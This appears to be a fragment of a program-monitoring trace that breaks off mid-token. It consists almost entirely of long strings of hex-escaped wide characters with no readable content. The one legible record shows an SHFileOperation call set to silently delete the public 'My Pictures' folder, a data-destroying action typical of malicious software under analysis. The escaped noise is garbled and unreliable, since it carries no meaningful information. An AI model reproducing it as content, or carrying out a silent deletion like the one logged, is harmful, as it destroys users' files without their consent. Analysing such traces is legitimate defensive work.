85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Documents\\My Pictures", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x